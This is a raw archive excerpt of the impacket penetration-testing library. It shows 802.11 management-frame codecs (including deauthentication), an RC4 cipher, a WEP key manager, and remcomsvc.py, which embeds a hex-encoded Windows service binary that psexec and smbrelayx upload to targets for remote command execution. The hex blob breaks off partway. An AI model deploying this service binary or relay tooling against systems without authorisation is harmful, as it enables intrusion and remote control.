Dot11ManagementDeauthentication(ProtocolPacket): '802.11 Management Deauthentication Frame' def __init__(self, aBuffer = None): header_size = 2 tail_size = 0 if aBuffer: ProtocolPacket.__init__(self, header_size, tail_size) self.load_packet(aBuffer) else: ProtocolPacket.__init__(self, header_size, tail_size) def get_reason_code(self): "Get the 802.11 Management Deauthentication or Disassociation Code." return self.header.get_word(0, "<") def set_reason_code(self, rc): self.header.set_word(0, rc, "<") class DOT11_AUTH_ALGORITHMS(): OPEN = 0 SHARED_KEY = 1 class DOT11_AUTH_STATUS_CODES(): SUCCESSFUL = 0 UNSPECIFIED_FAILURE = 1 # RESERVED = 2 - 9 CAP_REQ_UNSUPPORTED = 10 REASS_DENIED_CANNOT_CONFIRM_ASS_EXISTS = 11 ASS_DENIED_REASON_OUTSIDE_SCOPE_STANDARD = 12 STA_NOT_SUPPORT_AUTH_ALGORITHM = 13 AUTH_SEQ_OUT_OF_EXPECTED = 14 AUTH_REJECTED_CHALLENGE_FAILURE = 15 AUTH_REJECTED_TIMEOUT = 16 ASS_DENIED_AP_UNABLE_HANDLE_MORE_STA = 17 ASS_DENIED_STA_NOT_SUPPORTING_DATA_RATES = 18 ASS_DENIED_STA_NOT_SUPPORTING_SHORT_PREAMBLE = 19 ASS_DENIED_STA_NOT_SUPPORTING_PBCC_MODULATION = 20 ASS_DENIED_STA_NOT_SUPPORTING_CHANNEL_AGILITY = 21 ASS_REQUEST_REJECTED_SPACTRUM_MGT_CAP = 22 ASS_REQUEST_REJECTED_POWER_CAP_IE_UNNACCEPTABLE = 23 ASS_REQUEST_REJECTED_SUP_CH_IE_UNNACCEPTABLE = 24 ASS_DENIED_STA_NOT_SUPPORTING_SHORT_SLOT_TIME = 25 ASS_DENIED_STA_NOT_SUPPORTING_DSSS_OFDM = 26 # RESERVED = 27 - 31 UNSPECIFIED_QOS = 32 ASS_DENIED_QOS_UNSUFFICIENT_BANDWIDTH = 33 ASS_DENIED_EXCESSIVE_FRAME_LOST = 34 ASS_DENIED_STA_NOT_SUPPORT_QOS = 35 # RESERVED = 36 REQ_HAS_BEEN_DECLINED = 37 REQ_NOT_SUCCESSFUL_PARAM_INVALID_VALUE = 38 TSPEC = 39 INVALID_IE = 40 INVALID_GROUP_CIPHER = 41 INVALID_PAIRWISE_CIPHER = 42 INVALID_AKMP = 43 UNSUPPORTED_RSN_IE_VERSION = 44 INVALID_RSN_IE_CAP = 45 CIPHER_SUITE_REJECTED_SECURITY_POLICY = 46 TS_NOT_CREATED = 47 DIRECT_LINK_NOT_ALLOWED_BSS_POLICY = 48 DST_STA_NOT_PRESENT_IN_BSS = 49 DST_STA_NOT_QOS_STA = 50 ASS_DENIED_LISTEN_INTERVAL_TOO_LARGE = 51 # RESERVED = 52 - 65 535 class Dot11ManagementAuthentication(Dot11ManagementHelper): '802.11 Management Authentication Frame' __HEADER_BASE_SIZE = 6 # minimal header size def __init__(self, aBuffer = None): header_size = self.__HEADER_BASE_SIZE tail_size = 0 Dot11ManagementHelper.__init__(self, header_size, tail_size, aBuffer) def get_authentication_algorithm(self): "Get the 802.11 Management Authentication Algorithm." return self.header.get_word(0, "<") def set_authentication_algorithm(self, algorithm): "Set the 802.11 Management Authentication Algorithm." self.header.set_word(0, algorithm, "<") def get_authentication_sequence(self): "Get the 802.11 Management Authentication Sequence." return self.header.get_word(2, "<") def set_authentication_sequence(self, seq): "Set the 802.11 Management Authentication Sequence." self.header.set_word(2, seq, "<") def get_authentication_status(self): "Get the 802.11 Management Authentication Status." return self.header.get_word(4, "<") def set_authentication_status(self, status): "Set the 802.11 Management Authentication Status." self.header.set_word(4, status, "<") def get_challenge_text(self): return self._get_element(DOT11_MANAGEMENT_ELEMENTS.CHALLENGE_TEXT) def set_challenge_text(self, challenge): self._set_element(DOT11_MANAGEMENT_ELEMENTS.CHALLENGE_TEXT, challenge) def get_vendor_specific(self): "Get the 802.11 Management Vendor Specific elements "\ "as a list of tuples." "The Vendor Specific information element is used to carry "\ "information not defined in the standard within a single "\ "defined format" vs=[] gen_get_element=self._get_elements_generator(DOT11_MANAGEMENT_ELEMENTS.VENDOR_SPECIFIC) try: while 1: s=gen_get_element.next() if s is None: raise Exception("gen_get_element salio con None!!!") # OUI is 3 bytes oui=s[:3] data=s[3:] vs.append((oui,data)) except StopIteration: pass return vs def add_vendor_specific(self, oui, data): "Set the 802.11 Management Vendor Specific element. "\ "The Vendor Specific information element is used to carry "\ "information not defined in the standard within a single "\ "defined format" # 3 is the OUI length max_data_len=255-3 data_len=len(data) if data_len>max_data_len: raise Exception("data allow up to %d bytes long" % max_data) if len(oui) > 3: raise Exception("oui is three bytes long") self._set_element(DOT11_MANAGEMENT_ELEMENTS.VENDOR_SPECIFIC,oui+data, replace=False) class Dot11ManagementDisassociation(Dot11ManagementDeauthentication): '802.11 Management Disassociation Frame' def __init__(self, aBuffer = None): Dot11ManagementDeauthentication.__init__(self, aBuffer) class Dot11ManagementAssociationRequest(Dot11ManagementHelper): '802.11 Management Association Request Frame' __HEADER_BASE_SIZE = 4 # minimal header size def __init__(self, aBuffer = None): header_size = self.__HEADER_BASE_SIZE tail_size = 0 Dot11ManagementHelper.__init__(self, header_size, tail_size, aBuffer) def get_capabilities(self): 'Return the 802.11 Management Association Request Frame \'Capability information\' field. ' b = self.header.get_word(0, "<") return b def set_capabilities(self, value): 'Set the 802.11 Management Association Request Frame \'Capability Information\' field' # set the bits nb = value & 0xFFFF self.header.set_word(0, nb, "<") def get_listen_interval(self): 'Return the 802.11 Management Association Request Frame \'Listen Interval\' field. ' b = self.header.get_word(2, "<") return b def set_listen_interval(self, value): 'Set the 802.11 Management Association Request Frame \'Listen Interval\' field' self.header.set_word(2, value, "<") def get_ssid(self): "Get the 802.11 Management SSID element. "\ "The SSID element indicates the identity of an ESS or IBSS." return self._get_element(DOT11_MANAGEMENT_ELEMENTS.SSID) def set_ssid(self, ssid): self._set_element(DOT11_MANAGEMENT_ELEMENTS.SSID,ssid) def get_supported_rates(self, human_readable=False): "Get the 802.11 Management Supported Rates element. "\ "Specifies up to eight rates, then an Extended Supported Rate element "\ "shall be generated to specify the remaining supported rates."\ "If human_readable is True, the rates are returned in Mbit/sec" s=self._get_element(DOT11_MANAGEMENT_ELEMENTS.SUPPORTED_RATES) if s is None: return None rates=struct.unpack('%dB'%len(s),s) if not human_readable: return rates rates_Mbs=tuple(map(lambda x: (x&0x7F)*0.5,rates)) return rates_Mbs def set_supported_rates(self, rates): "Set the 802.11 Management Supported Rates element. "\ "Specifies a tuple or list with up to eight rates, then an "\ "Extended Supported Rate element shall be generated to specify "\ "the remaining supported rates." qty_rates=len(rates) if qty_rates>8: raise Exception("requires up to eight rates") rates_string=struct.pack('B'*qty_rates,*rates) self._set_element(DOT11_MANAGEMENT_ELEMENTS.SUPPORTED_RATES,rates_string) def get_rsn(self): "Get the 802.11 Management Robust Security Network element." s = self._get_element(DOT11_MANAGEMENT_ELEMENTS.RSN) if s is None: return None return s def set_rsn(self, data): "Set the 802.11 Management Robust Security Network element." self._set_element(DOT11_MANAGEMENT_ELEMENTS.RSN, data) def get_vendor_specific(self): "Get the 802.11 Management Vendor Specific elements "\ "as a list of tuples." "The Vendor Specific information element is used to carry "\ "information not defined in the standard within a single "\ "defined format" vs=[] gen_get_element=self._get_elements_generator(DOT11_MANAGEMENT_ELEMENTS.VENDOR_SPECIFIC) try: while 1: s=gen_get_element.next() if s is None: raise Exception("gen_get_element salio con None!!!") # OUI is 3 bytes oui=s[:3] data=s[3:] vs.append((oui,data)) except StopIteration: pass return vs def add_vendor_specific(self, oui, data): "Set the 802.11 Management Vendor Specific element. "\ "The Vendor Specific information element is used to carry "\ "information not defined in the standard within a single "\ "defined format" # 3 is the OUI length max_data_len=255-3 data_len=len(data) if data_len>max_data_len: raise Exception("data allow up to %d bytes long" % max_data) if len(oui) > 3: raise Exception("oui is three bytes long") self._set_element(DOT11_MANAGEMENT_ELEMENTS.VENDOR_SPECIFIC,oui+data, replace=False) class Dot11ManagementAssociationResponse(Dot11ManagementHelper): '802.11 Management Association Response Frame' __HEADER_BASE_SIZE = 6 # minimal header size def __init__(self, aBuffer = None): header_size = self.__HEADER_BASE_SIZE tail_size = 0 Dot11ManagementHelper.__init__(self, header_size, tail_size, aBuffer) def get_capabilities(self): 'Return the 802.11 Management Association Response Frame \'Capability information\' field. ' b = self.header.get_word(0, "<") return b def set_capabilities(self, value): 'Set the 802.11 Management Association Response Frame \'Capability Information\' field' # set the bits nb = value & 0xFFFF self.header.set_word(0, nb, "<") def get_status_code(self): 'Return the 802.11 Management Association Response Frame \'Status Code\' field. ' b = self.header.get_word(2, "<") return b def set_status_code(self, value): 'Set the 802.11 Management Association Response Frame \'Status Code\' field' self.header.set_word(2, value, "<") def get_association_id(self): 'Return the 802.11 Management Association Response Frame \'Association Id\' field. ' b = self.header.get_word(4, "<") return b def set_association_id(self, value): 'Set the 802.11 Management Association Response Frame \'Association Id\' field' self.header.set_word(4, value, "<") def get_supported_rates(self, human_readable=False): "Get the 802.11 Management Supported Rates element. "\ "Specifies up to eight rates, then an Extended Supported Rate element "\ "shall be generated to specify the remaining supported rates."\ "If human_readable is True, the rates are returned in Mbit/sec" s=self._get_element(DOT11_MANAGEMENT_ELEMENTS.SUPPORTED_RATES) if s is None: return None rates=struct.unpack('%dB'%len(s),s) if not human_readable: return rates rates_Mbs=tuple(map(lambda x: (x&0x7F)*0.5,rates)) return rates_Mbs def set_supported_rates(self, rates): "Set the 802.11 Management Supported Rates element. "\ "Specifies a tuple or list with up to eight rates, then an "\ "Extended Supported Rate element shall be generated to specify "\ "the remaining supported rates." qty_rates=len(rates) if qty_rates>8: raise Exception("requires up to eight rates") rates_string=struct.pack('B'*qty_rates,*rates) self._set_element(DOT11_MANAGEMENT_ELEMENTS.SUPPORTED_RATES,rates_string) def get_vendor_specific(self): "Get the 802.11 Management Vendor Specific elements "\ "as a list of tuples." "The Vendor Specific information element is used to carry "\ "information not defined in the standard within a single "\ "defined format" vs=[] gen_get_element=self._get_elements_generator(DOT11_MANAGEMENT_ELEMENTS.VENDOR_SPECIFIC) try: while 1: s=gen_get_element.next() if s is None: raise Exception("gen_get_element salio con None!!!") # OUI is 3 bytes oui=s[:3] data=s[3:] vs.append((oui,data)) except StopIteration: pass return vs def add_vendor_specific(self, oui, data): "Set the 802.11 Management Vendor Specific element. "\ "The Vendor Specific information element is used to carry "\ "information not defined in the standard within a single "\ "defined format" # 3 is the OUI length max_data_len=255-3 data_len=len(data) if data_len>max_data_len: raise Exception("data allow up to %d bytes long" % max_data) if len(oui) > 3: raise Exception("oui is three bytes long") self._set_element(DOT11_MANAGEMENT_ELEMENTS.VENDOR_SPECIFIC,oui+data, replace=False) class Dot11ManagementReassociationRequest(Dot11ManagementHelper): '802.11 Management Reassociation Request Frame' __HEADER_BASE_SIZE = 10 # minimal header size def __init__(self, aBuffer = None): header_size = self.__HEADER_BASE_SIZE tail_size = 0 Dot11ManagementHelper.__init__(self, header_size, tail_size, aBuffer) def get_capabilities(self): 'Return the 802.11 Management Reassociation Request Frame \'Capability information\' field. ' b = self.header.get_word(0, "<") return b def set_capabilities(self, value): 'Set the 802.11 Management Reassociation Request Frame \'Capability Information\' field' # set the bits nb = value & 0xFFFF self.header.set_word(0, nb, "<") def get_listen_interval(self): 'Return the 802.11 Management Reassociation Request Frame \'Listen Interval\' field. ' b = self.header.get_word(2, "<") return b def set_listen_interval(self, value): 'Set the 802.11 Management Reassociation Request Frame \'Listen Interval\' field' self.header.set_word(2, value, "<") def get_current_ap(self): 'Return the 802.11 Management Reassociation Request Frame \'Current AP\' field.' return self.header.get_bytes()[4:10] def set_current_ap(self, value): 'Set the 802.11 Management Reassociation Request Frame \'Current AP\' field' for i in range(0, 6): self.header.set_byte(4+i, value[i]) def get_ssid(self): "Get the 802.11 Management SSID element. "\ "The SSID element indicates the identity of an ESS or IBSS." return self._get_element(DOT11_MANAGEMENT_ELEMENTS.SSID) def set_ssid(self, ssid): self._set_element(DOT11_MANAGEMENT_ELEMENTS.SSID,ssid) def get_supported_rates(self, human_readable=False): "Get the 802.11 Management Supported Rates element. "\ "Specifies up to eight rates, then an Extended Supported Rate element "\ "shall be generated to specify the remaining supported rates."\ "If human_readable is True, the rates are returned in Mbit/sec" s=self._get_element(DOT11_MANAGEMENT_ELEMENTS.SUPPORTED_RATES) if s is None: return None rates=struct.unpack('%dB'%len(s),s) if not human_readable: return rates rates_Mbs=tuple(map(lambda x: (x&0x7F)*0.5,rates)) return rates_Mbs def set_supported_rates(self, rates): "Set the 802.11 Management Supported Rates element. "\ "Specifies a tuple or list with up to eight rates, then an "\ "Extended Supported Rate element shall be generated to specify "\ "the remaining supported rates." qty_rates=len(rates) if qty_rates>8: raise Exception("requires up to eight rates") rates_string=struct.pack('B'*qty_rates,*rates) self._set_element(DOT11_MANAGEMENT_ELEMENTS.SUPPORTED_RATES,rates_string) def get_rsn(self): "Get the 802.11 Management Robust Security Network element." s = self._get_element(DOT11_MANAGEMENT_ELEMENTS.RSN) if s is None: return None return s def set_rsn(self, data): "Set the 802.11 Management Robust Security Network element." self._set_element(DOT11_MANAGEMENT_ELEMENTS.RSN, data) def get_vendor_specific(self): "Get the 802.11 Management Vendor Specific elements "\ "as a list of tuples." "The Vendor Specific information element is used to carry "\ "information not defined in the standard within a single "\ "defined format" vs=[] gen_get_element=self._get_elements_generator(DOT11_MANAGEMENT_ELEMENTS.VENDOR_SPECIFIC) try: while 1: s=gen_get_element.next() if s is None: raise Exception("gen_get_element salio con None!!!") # OUI is 3 bytes oui=s[:3] data=s[3:] vs.append((oui,data)) except StopIteration: pass return vs def add_vendor_specific(self, oui, data): "Set the 802.11 Management Vendor Specific element. "\ "The Vendor Specific information element is used to carry "\ "information not defined in the standard within a single "\ "defined format" # 3 is the OUI length max_data_len=255-3 data_len=len(data) if data_len>max_data_len: raise Exception("data allow up to %d bytes long" % max_data) if len(oui) > 3: raise Exception("oui is three bytes long") self._set_element(DOT11_MANAGEMENT_ELEMENTS.VENDOR_SPECIFIC,oui+data, replace=False) class Dot11ManagementReassociationResponse(Dot11ManagementAssociationResponse): '802.11 Management Reassociation Response Frame' def __init__(self, aBuffer = None): Dot11ManagementAssociationResponse.__init__(self, aBuffer) impacket-0.9.10/impacket/Dot11Crypto.py0000600000076500000240000000207612141750575017716 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: Dot11Crypto.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # # Description: # IEEE 802.11 Network packet codecs. # # Author: # Gustavo Moreira class RC4(): def __init__(self, key): j = 0 self.state = range(256) for i in range(256): j = (j + self.state[i] + ord(key[i % len(key)])) & 0xff self.state[i],self.state[j] = self.state[j],self.state[i] # SSWAP(i,j) def encrypt(self, data): i = j = 0 out='' for char in data: i = (i+1) & 0xff j = (j+self.state[i]) & 0xff self.state[i],self.state[j] = self.state[j],self.state[i] # SSWAP(i,j) out+=chr(ord(char) ^ self.state[(self.state[i] + self.state[j]) & 0xff]) return out def decrypt(self, data): # It's symmetric return self.encrypt(data) impacket-0.9.10/impacket/Dot11KeyManager.py0000600000076500000240000000314312141750575020455 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: Dot11KeyManager.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # # Description: # IEEE 802.11 Network packet codecs. # # Author: # Gustavo Moreira from array import array class KeyManager: def __init__(self): self.keys = {} def __get_bssid_hasheable_type(self, bssid): # List is an unhashable type if not isinstance(bssid, (list,tuple,array)): raise Exception('BSSID datatype must be a tuple, list or array') return tuple(bssid) def add_key(self, bssid, key): bssid=self.__get_bssid_hasheable_type(bssid) if not bssid in self.keys: self.keys[bssid] = key return True else: return False def replace_key(self, bssid, key): bssid=self.__get_bssid_hasheable_type(bssid) self.keys[bssid] = key return True def get_key(self, bssid): bssid=self.__get_bssid_hasheable_type(bssid) if self.keys.has_key(bssid): return self.keys[bssid] else: return False def delete_key(self, bssid): bssid=self.__get_bssid_hasheable_type(bssid) if not isinstance(bssid, list): raise Exception('BSSID datatype must be a list') if self.keys.has_key(bssid): del self.keys[bssid] return True return False impacket-0.9.10/impacket/examples/0000700000076500000240000000000012141751750017056 5ustar betostaff00000000000000impacket-0.9.10/impacket/examples/__init__.py0000600000076500000240000000000512141750575021170 0ustar betostaff00000000000000pass impacket-0.9.10/impacket/examples/remcomsvc.py0000600000076500000240000035755712141750575021462 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: remcomsvc.py 650 2012-08-09 16:56:32Z bethus@gmail.com $ # # REMCOMSVC library. It provides a way to retrieve the RemComSvc binary file to be # uploaded to the target machine. This is used by psexec and smbrelayx # # If you want to compile this file yourself, get the source code from # https://github.com/kavika13/RemCom, compile RemComSvc project, and # dump the binary (hexlify) in this file, on the REMCOMSVC variable # # Author: # Alberto Solino (bethus@gmail.com) # # Copyright note in remcomsvc.cpp: # # Copyright (c) 2006 Talha Tariq [ talha.tariq@gmail.com ] # All rights are reserved. # # Permission to use, copy, modify, and distribute this software # for any purpose and without any fee is hereby granted, # provided this notice is included in its entirety in the # documentation and in the source files. # # This software and any related documentation is provided "as is" # without any warranty of any kind, either express or implied, # including, without limitation, the implied warranties of # merchantability or fitness for a particular purpose. The entire # risk arising out of use or performance of the software remains # with you. # # $Author: Talha Tariq [ talha.tariq@gmail.com ] # uses some code from xCmd by Zoltan Csizmadia # $Revision: Talha Tariq [ talha.tariq@gmail.com ] # $Revision: Andres Ederra # import binascii class RemComSvc: def __init__(self): self.binary = binascii.unhexlify(REMCOMSVC) self.offset = 0 def read(self, amount): # Returns amount of bytes and updates the offset within REMCOMSVC variable data = self.binary[self.offset:self.offset+amount] self.offset += amount return data def seek(self, offset): self.offset = offset def close(self): return REMCOMSVC='4d5a90000300000004000000ffff0000b800000000000000400000000000' \ '000000000000000000000000000000000000000000000000000000000000d80000000e' \ '1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f74206265' \ '2072756e20696e20444f53206d6f64652e0d0d0a24000000000000008030ee41c45180' \ '12c4518012c4518012cd291512d4518012cd290312a4518012e397fb12c1518012c451' \ '8112b4518012cd290412e5518012cd291112c551801252696368c45180120000000000' \ '0000000000000000000000504500004c010500b1cf23500000000000000000e0000201' \ '0b010900009400000044000000000000a61d00000010000000b0000000004000001000' \ '0000020000050000000000000005000000000000000030010000040000bc3801000300' \ '40810000100000100000000010000010000000000000100000000000000000000000c4' \ 'c800003c00000000100100b40100000000000000000000000000000000000000200100' \ '1409000000000000000000000000000000000000000000000000000000000000000000' \ '0080c4000040000000000000000000000000b000008801000000000000000000000000' \ '00000000000000000000000000002e74657874000000c4930000001000000094000000' \ '040000000000000000000000000000200000602e726461746100009821000000b00000' \ '0022000000980000000000000000000000000000400000402e646174610000002c2e00' \ '0000e000000010000000ba0000000000000000000000000000400000c02e7273726300' \ '0000b4010000001001000002000000ca0000000000000000000000000000400000402e' \ '72656c6f630000a40f0000002001000010000000cc0000000000000000000000000000' \ '4000004200000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '00000000000000000000000000005357683f000f0033db5353ff1520b040008bf83bfb' \ '746a5668ff010f0068c8b1400057ff1524b040008bf03bf3750b57ff1528b040005e5f' \ '5bc356ff152cb04000a100ef40006804ef400050c70508ef400001000000891d18ef40' \ '00891d1cef4000891d10ef4000891d14ef4000ff1530b04000568b3528b04000ffd657' \ 'ffd65e5f5bc3cccccccccccccccccccccccc558bec8b450883e801740da100ef400068' \ '04ef400050eb348b0d20ef400051ff1578b040008b1500ef400033c06804ef4000a310' \ 'ef4000c70508ef400001000000a318ef4000a31cef400052ff1530b0400085c07506ff' \ '1580b040005dc20400558bec83ec30a100e0400033c58945fc5356578b7d08897de0ff' \ '1564b0400033db505368ffff1f00895de8c745ec3200000033f6885df4885df5885df6' \ '885df7885df8c645f905895ddc895de4895df0891fff1568b040008d4de8516a085089' \ '45d8ff150cb0400085c0750eff1580b040008945f0e9380100008b55ec5253ff156cb0' \ '40008bf03bf3750eff1580b040008945f0e9190100008b4dec8b55e88b1d10b040008d' \ '45ec5051566a0252ffd38b3d80b0400085c07553ffd783f87a740affd78945f0e9e700' \ '000056ff1570b040008b45ec506a00ff156cb040008bf085f6750affd78945f0e9c400' \ '00008b55ec8b45e88d4dec5152566a0250ffd385c0750affd78945f0e9a50000008b1d' \ '14b040008d4ddc516a006a006a006a006a006a006a006a046a018d55f452ffd385c075' \ '07ffd78945f0eb788d45e4506a006a006a006a006a006a006a006a066a018d4df451ff' \ 'd385c07507ffd78945f0eb5133db391e763d8d7e048d9b000000008b4ddc8b078b5704' \ '51508945d08955d4ff1518b0400085c0757b8b55e48b45d05250ff1518b0400085c075' \ '744383c7083b1e72cc8b45e08338007506c700010000008b45e48b3d1cb0400085c074' \ '0350ffd78b45dc85c0740350ffd785f6740756ff1570b040008b45e88b3574b0400085' \ 'c0740350ffd68b45d885c0740350ffd68b4dfc8b45f05f5e33cd5be8790500008be55d' \ 'c38b4de0c70100000000eba28b55e0c70201000000eb97cccccccccc5633f668901040' \ '0068d4b14000c70504ef400030000000c70508ef400002000000c7050cef4000010000' \ '00893510ef4000893514ef4000893518ef400089351cef4000ff1508b04000a300ef40' \ '003bc6744e6804ef400050c70508ef400004000000893518ef400089351cef4000ff15' \ '30b0400085c0750aff1580b040005ec2080056565656ff1560b0400056566830184000' \ 'a320ef4000e8cd05000083c40c5ec20800cccccccccccccccccccccccc558bec83ec14' \ '8d45fc50c745ecc8b14000c745f010134000c745f400000000c745f800000000c745fc' \ '01000000e8fefcffff83c404837dfc00750d68dcb14000e82e06000083c4048d4dec51' \ 'ff1504b040008be55dc3cccccccccccccccccccc558bec83ec20535633c0578945f889' \ '45fc6a018d45e050c745f400000000ff1534b040006a006a006a018d4de051ff1500b0' \ '40008b750c8b7d08814e2c0001000083c8ff89463c8946388946408b8708110000508d' \ '9f0c110000536834b240008d55e06824b240006830ef4000c745f40c0000008955f8c7' \ '45fc01000000e8550600008b8f0811000051536814b240006824b240006838f04000e8' \ '390600008b970811000052536804b240006824b240006840f14000e81d0600008b3d58' \ 'b0400083c43c8d45f4506aff6a006a0068ff0000006a046a026830ef4000ffd78d4df4' \ '516aff6a006a0068ff0000006a046a026840f1400089463cffd78d55f4526aff6a006a' \ '0068ff0000008946406a046a016838f04000ffd78b4e3c89463883f9ff7432837e40ff' \ '742c83f8ff74278b3d5cb040006a0051ffd78b46386a0050ffd78b4e406a0051ffd75f' \ '5eb8010000005b8be55dc38b3d74b0400051ffd78b564052ffd78b463850ffd75f5e33' \ 'c05b8be55dc3cccccccccccccccccccccccccc558bec81ec60010000a100e0400033c5' \ '8945fc568b7508578b7d0c6a448d85a0feffff6a0050e8b50500008d8da0feffff5156' \ 'c785a0feffff44000000e83efeffff83c41485c075155fb8020000005e8b4dfc33cde8' \ '700200008be55dc353568d95f8feffff6844b2400052c70700000000c785f4feffff00' \ '000000e8d70400000fbe860010000083c40c8d8e00100000f7d81bc023c18d8de4feff' \ 'ff518d95a0feffff52508b86041100006a000d00000008506a016a006a008d8df8feff' \ 'ff516a00ff154cb0400085c0743f8b85e4feffffc7070000000083be10120000008bd8' \ '75326aff50ff1550b040005753ff1554b040008b85f4feffff5b5f5e8b4dfc33cde8c2' \ '0100008be55dc3c785f4feffff010000008b4dfc8b85f4feffff5b5f33cd5ee8a10100' \ '008be55dc3cccccc558becb828120000e823050000a100e0400033c58945fc568b7508' \ '6828ef4000ff1544b0400033c0508985e0edffff8985e4edffff8d85dcedffff506814' \ '1200008d8de8edffff5156ff157cb0400085c0743e83bddcedffff0074358d95e4edff' \ 'ff528d85e8edffff50e861feffff83c4086a008d8dd8edffff516a088d95e0edffff52' \ '568985e0edffffff153cb0400056ff1540b0400056ff1574b040006828ef4000ff1548' \ 'b04000833d28ef4000005e750ca120ef400050ff1578b040008b4dfc33cde8d0000000' \ '8be55dc3cccc558bec83ec20538b1d00b0400056578b3d34b0400033c08945f88945fc' \ '6a018d45e050c745f400000000ffd76a016a006a018d4de051ffd38d45f4506aff6a00' \ '6a0068ff0000006a046a038d55e06848b24000c745f40c0000008955f8c745fc010000' \ '00ff1558b040008bf085f674a56a0056ff155cb04000566a0068d0164000e854010000' \ '83c40ceb8acccccccccc566a006a0068a0174000e83b0100008b3550b0400083c40ca1' \ '20ef40006a0a50ffd685c075f2e8a5f7ffff8b0d20ef400051ff1574b040005ec33b0d' \ '00e040007502f3c3e937050000833d240e41000056741568240e4100e8030d00005985' \ 'c07406ff15240e4100e8a40800008bf085f674168b460483f8ff740750ff1574b04000' \ '56e84b0a0000596a00ff1584b04000cc6a0c68f0c44000e81a120000e8e70800008365' \ 'fc00ff7058ff505459e896ffffff8b45ec8b088b09894de45051e8921000005959c38b' \ '65e8ff75e4e801100000cc8bff558bece8bf060000e8b406000050e89406000085c075' \ '1fff7508e8a206000050e8d606000085c07528ff1580b0400050ff1584b040008b4d08' \ '8b51548950548b51588950588b510451895004e87e080000833d280e41000074156828' \ '0e4100e8270c00005985c07406ff15280e4100e849ffffffcc8bff558bec5153578b7d' \ '0833db895dfc3bfb7520e88b1300005353535353c70016000000e86816000083c41483' \ 'c8ffe98100000056e81806000068140200006a01e87a1400008bf059593bf3744ae8ed' \ '070000ff706c56e8840600008b45105959566a04566803194000ff750c897e54538946' \ '58ff158cb040008bf8897e043bfb740c57ff1588b0400083f8ff7523ff1580b0400089' \ '45fc56e84f13000059395dfc7409ff75fce81e1300005983c8ffeb028bc75e5f5bc9c3' \ '6a0c6810c54000e8a910000033c033f63975080f95c03bc6751de8cc120000c7001600' \ '00005656565656e8a915000083c41483c8ffeb5fe8c21500006a205b03c3506a01e8cd' \ '16000059598975fce8ab15000003c350e858170000598bf88d450c5056ff7508e89315' \ '000003c350e83d1900008945e4e88315000003c35057e8cb17000083c418c745fcfeff' \ 'ffffe8090000008b45e4e85f100000c3e85d15000083c020506a01e8d81600005959c3' \ 'a100e0400083c80133c9390544f240000f94c18bc1c38bff558bec83ec205333db395d' \ '0c751de8111200005353535353c70016000000e8ee14000083c41483c8ffeb4d8b4508' \ '3bc374dc568945e88945e08d45105053ff750c8d45e050c745e4ffffff7fc745ec4200' \ '0000e89118000083c410ff4de48bf078078b45e08818eb0c8d45e05053e80e24000059' \ '598bc65e5bc9c3cccccccccccccccccccccc8b54240c8b4c240485d2746933c08a4424' \ '0884c0751681fa00010000720e833de0fd4000007405e98a250000578bf983fa047231' \ 'f7d983e103740c2bd1880783c70183e90175f68bc8c1e00803c18bc8c1e01003c18bca' \ '83e203c1e9027406f3ab85d2740a880783c70183ea0175f68b4424085fc38b442404c3' \ 'cccccccccccc518d4c24042bc81bc0f7d023c88bc42500f0ffff3bc8720a8bc159948b' \ '00890424c32d001000008500ebe98bff558bec833d50f24000027405e841280000ff75' \ '08e88e26000068ff000000e8810a000059595dc36a146830c54000e8880e0000b84d5a' \ '0000663905000040007538a13c00400081b800004000504500007527b90b0100006639' \ '8818004000751983b8740040000e761033c93988e80040000f95c1894de4eb048365e4' \ '006a01e8112f00005985c075086a1ce86effffff59e8ae06000085c075086a10e85dff' \ 'ffff59e8a22e00008365fc00e8452c000085c07d086a1be89509000059ff1590b04000' \ 'a3200e4100e8f22a0000a348f24000e82d2a000085c07d086a08e86f09000059e8a427' \ '000085c07d086a09e85e090000596a01e8150a00005985c0740750e84b09000059a19c' \ 'f54000a3a0f5400050ff3594f54000ff3590f54000e871f6ffff83c40c8945e0837de4' \ '00750650e88c0b0000e8b30b0000eb2e8b45ec8b088b09894ddc5051e80d0c00005959' \ 'c38b65e88b45dc8945e0837de400750650e8720b0000e8920b0000c745fcfeffffff8b' \ '45e0e8880d0000c3e8472e0000e9a4feffff8bff558bec81ec28030000a360f3400089' \ '0d5cf34000891558f34000891d54f34000893550f34000893d4cf34000668c1578f340' \ '00668c0d6cf34000668c1d48f34000668c0544f34000668c2540f34000668c2d3cf340' \ '009c8f0570f340008b4500a364f340008b4504a368f340008d4508a374f340008b85e0' \ 'fcffffc705b0f2400001000100a168f34000a364f24000c70558f24000090400c0c705' \ '5cf2400001000000a100e040008985d8fcffffa104e040008985dcfcffffff15a4b040' \ '00a3a8f240006a01e80b2e0000596a00ff15a0b040006868b24000ff159cb04000833d' \ 'a8f240000075086a01e8e72d00005968090400c0ff1598b0400050ff1594b04000c9c3' \ '8bff558bec56ff3518e040008b35b0b04000ffd685c07421a114e0400083f8ff741750' \ 'ff3518e04000ffd6ffd085c074088b80f8010000eb27be80b2400056ff15a8b0400085' \ 'c0750b56e8480700005985c074186870b2400050ff15acb0400085c07408ff7508ffd0' \ '8945088b45085e5dc36a00e887ffffff59c38bff558bec56ff3518e040008b35b0b040' \ '00ffd685c07421a114e0400083f8ff741750ff3518e04000ffd6ffd085c074088b80fc' \ '010000eb27be80b2400056ff15a8b0400085c0750b56e8cd0600005985c07418689cb2' \ 